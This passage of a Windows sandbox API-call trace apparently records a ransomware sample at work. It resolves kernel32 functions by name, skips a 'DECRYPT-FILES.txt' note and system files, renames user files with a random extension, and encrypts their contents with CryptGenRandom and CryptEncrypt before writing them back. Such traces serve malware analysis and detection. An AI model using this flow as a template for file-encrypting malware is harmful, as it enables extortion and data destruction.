returned="CreateMutexA" [0082.894] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.894] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.894] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.894] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.894] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.894] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.894] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.894] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.894] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.894] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.894] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.895] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.895] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.895] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.895] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.895] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.896] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.896] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.896] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.896] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.896] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.896] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.896] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.896] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.896] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.896] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.896] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.896] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.896] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.896] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.896] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.896] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.896] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.896] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.897] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.897] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.897] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.897] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.897] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.897] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.897] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.897] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.897] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.897] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.897] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.897] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.897] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.897] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.897] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.897] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.897] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.897] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.897] lstrlenA (lpString="DELETEATOM") returned 10 [0082.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.898] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.898] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.898] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.898] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.898] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.898] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.898] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.898] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.898] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.898] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.898] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.898] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.898] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.898] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.898] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.898] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.898] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.898] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.899] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.899] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.899] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.899] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.899] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.899] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.899] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.899] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.899] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.899] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.899] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.899] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.899] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.899] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.899] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.899] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.899] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.899] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.899] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.900] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.900] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.900] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.900] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.900] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.900] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.900] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.900] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.900] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5-fWrl.mp3") returned 48 [0082.900] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5-fWrl.mp3.T9z9h4") returned 55 [0082.900] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5-fWrl.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5-fwrl.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5-fWrl.mp3.T9z9h4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5-fwrl.mp3.t9z9h4"), dwFlags=0x0) returned 1 [0082.901] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.901] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.901] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.901] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0384670, ftCreationTime.dwHighDateTime=0x1d4cc3a, ftLastAccessTime.dwLowDateTime=0xbb6ab570, ftLastAccessTime.dwHighDateTime=0x1d4c9a0, ftLastWriteTime.dwLowDateTime=0xbb6ab570, ftLastWriteTime.dwHighDateTime=0x1d4c9a0, nFileSizeHigh=0x0, nFileSizeLow=0x165ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="5QUa1fvtx-.m4a", cAlternateFileName="5QUA1F~1.M4A")) returned 1 [0082.901] lstrcmpiW (lpString1="5QUa1fvtx-.m4a", lpString2="DECRYPT-FILES.txt") returned -1 [0082.901] lstrcmpiW (lpString1="5QUa1fvtx-.m4a", lpString2="autorun.inf") returned -1 [0082.901] lstrcmpiW (lpString1="5QUa1fvtx-.m4a", lpString2="boot.ini") returned -1 [0082.901] lstrcmpiW (lpString1="5QUa1fvtx-.m4a", lpString2="desktop.ini") returned -1 [0082.901] lstrcmpiW (lpString1="5QUa1fvtx-.m4a", lpString2="ntuser.dat") returned -1 [0082.901] lstrcmpiW (lpString1="5QUa1fvtx-.m4a", lpString2="iconcache.db") returned -1 [0082.901] lstrcmpiW (lpString1="5QUa1fvtx-.m4a", lpString2="bootsect.bak") returned -1 [0082.902] lstrcmpiW (lpString1="5QUa1fvtx-.m4a", lpString2="ntuser.dat.log") returned -1 [0082.902] lstrcmpiW (lpString1="5QUa1fvtx-.m4a", lpString2="thumbs.db") returned -1 [0082.902] lstrcmpiW (lpString1="5QUa1fvtx-.m4a", lpString2="Bootfont.bin") returned -1 [0082.902] lstrlenW (lpString="5QUa1fvtx-.m4a") returned 14 [0082.902] lstrcmpiW (lpString1="m4a", lpString2="lnk") returned 1 [0082.902] lstrcmpiW (lpString1="m4a", lpString2="exe") returned 1 [0082.902] lstrcmpiW (lpString1="m4a", lpString2="sys") returned -1 [0082.902] lstrcmpiW (lpString1="m4a", lpString2="dll") returned 1 [0082.902] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0082.902] lstrlenW (lpString="5QUa1fvtx-.m4a") returned 14 [0082.902] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0082.902] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="5QUa1fvtx-.m4a" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5QUa1fvtx-.m4a") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5QUa1fvtx-.m4a" [0082.902] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.902] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5QUa1fvtx-.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5qua1fvtx-.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0082.902] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=91630) returned 1 [0082.902] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0082.902] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x10d0000 [0082.902] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.903] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.903] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.903] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0082.903] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10f0000 [0082.905] VirtualFree (lpAddress=0x10f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.905] UnmapViewOfFile (lpBaseAddress=0x10d0000) returned 1 [0082.906] CloseHandle (hObject=0x43c) returned 1 [0082.906] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.906] WriteFile (in: hFile=0x438, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0082.907] CloseHandle (hObject=0x0) returned 0 [0082.907] CloseHandle (hObject=0x438) returned 1 [0082.907] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.907] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.907] GetTickCount () returned 0x114d328 [0082.907] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.908] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.908] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.908] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.908] lstrlenA (lpString="kernel32.dll") returned 12 [0082.908] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.908] lstrcpyA (in: 